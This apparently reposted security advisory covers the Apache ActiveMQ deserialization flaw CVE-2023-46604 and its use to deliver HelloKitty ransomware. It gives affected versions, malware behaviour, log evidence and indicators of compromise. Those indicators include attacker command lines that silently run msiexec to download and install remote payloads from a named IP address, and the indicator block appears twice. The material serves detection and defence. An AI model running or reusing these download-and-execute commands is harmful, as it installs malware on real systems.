CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ, allowing a remote attacker with network access to manipulate serialized class types in the OpenWire protocol, enabling the triggering of any class on the classpath. This is one of the more complex vulnerabilities we've seen, but the root cause of the issue is insecure deserialization.
Apache disclosed the security flaw and released new versions of ActiveMQ on October 25, 2023. Both proof-of-concept attack code and vulnerability details are publicly available. Rapid7's security research team tested the public PoC and confirmed that the observed behavior in their customer environments aligns with the exploitation of CVE-2023-46604, as expected. Rapid7's research has a technical analysis of the vulnerability on AttackerKB.
Affected Products
According to Apache's advisory, CVE-2023-46604 impacts:
Apache ActiveMQ versions prior to 5.18.0, before 5.18.3
Apache ActiveMQ versions prior to 5.17.0, before 5.17.6
Apache ActiveMQ versions prior to 5.16.0, before 5.16.7
Apache ActiveMQ versions prior to 5.15.16
Apache ActiveMQ Legacy OpenWire Module versions prior to 5.18.0, before 5.18.3
Apache ActiveMQ Legacy OpenWire Module versions prior to 5.17.0, before 5.17.6
Apache ActiveMQ Legacy OpenWire Module versions prior to 5.16.0, before 5.16.7
Apache ActiveMQ Legacy OpenWire Module versions prior to 5.15.16
How Does the Attack Work?
During successful exploitation of the vulnerability, Java.exe will include the targeted specific Apache application— in this case, observed as the parent process in D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64. Following the attack, it was observed that the threat actor attempted to install remote binary files named M2.png and M4.png using MSIExec. The threat actor's attempts to distribute ransomware were somewhat clumsy: in one of the observed events by Rapid7, there were more than half a dozen unsuccessful attempts to encrypt assets.
HelloKitty Ransomware Details
Rapid7 obtained MSI files M4.png and M2.png from the domain 172.245.16[.]125 and analyzed them in a controlled environment. Following analysis, Rapid7 observed that both MSI files contained a 32-bit .NET executable named dllloader internally. Within the .NET executable dllloader, Rapid7 found that it imported a payload encoded with Base64. After decoding the Base64-encoded payload, Rapid7 determined it to be EncDLL, a 32-bit .NET DLL.
The EncDLL binary exhibited functionality similar to ransomware— the DLL searches for specific processes and terminates them. Rapid7 observed that the DLL encrypts certain file extensions using the RSACryptoServiceProvider function and appends the encrypted files with the .locked extension. Additionally, Rapid7 observed another function that provides information about which directories should not be encrypted, a constant variable assigned with the ransom note, and a function attempting to communicate with an HTTP server, 172.245.16[.]125.
Indicators of Compromise
Rapid7's vulnerability research team analyzed CVE-2023-46604 and the publicly available exploit code. In our test setup, there was a single entry line in the activemq.log file indicating successful exploitation of CVE-2023-46604: [entry line].
Kod:
2023-10-31 05:04:58,736 | WARN | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616In the example above, the IP address of the attacker (i.e., researcher) was 192.168.86.35, and the target TCP port was 61616. Depending on logging settings, more or less information may be available, and these settings can be modified.
Other Indicators of Compromise:
http://172.245.16[.]125/m2.png
http://172.245.16[.]125/m4.png
Files dropped and executed with msiexec command:
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"
The following file hashes were part of two MSI packages downloaded from the domain 172.245.16[.]125:
M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5
Preventive Measures Guide
Organizations should update to a patched version of ActiveMQ as soon as possible and should look for signs of compromise in their environments. Updated patches provided by Apache can be accessed here. Information on enhancing the security of ActiveMQ applications can be found here.
Main Topic Link CVE-2023-46604 Apache ActiveMQ Nedir ?
Other Indicators of Compromise:
http://172.245.16[.]125/m2.png
http://172.245.16[.]125/m4.png
Files dropped and executed with msiexec command:
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"
The following file hashes were part of two MSI packages downloaded from the domain 172.245.16[.]125:
M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5
Preventive Measures Guide
Organizations should update to a patched version of ActiveMQ as soon as possible and should look for signs of compromise in their environments. Updated patches provided by Apache can be accessed here. Information on enhancing the security of ActiveMQ applications can be found here.
Main Topic Link CVE-2023-46604 Apache ActiveMQ Nedir ?
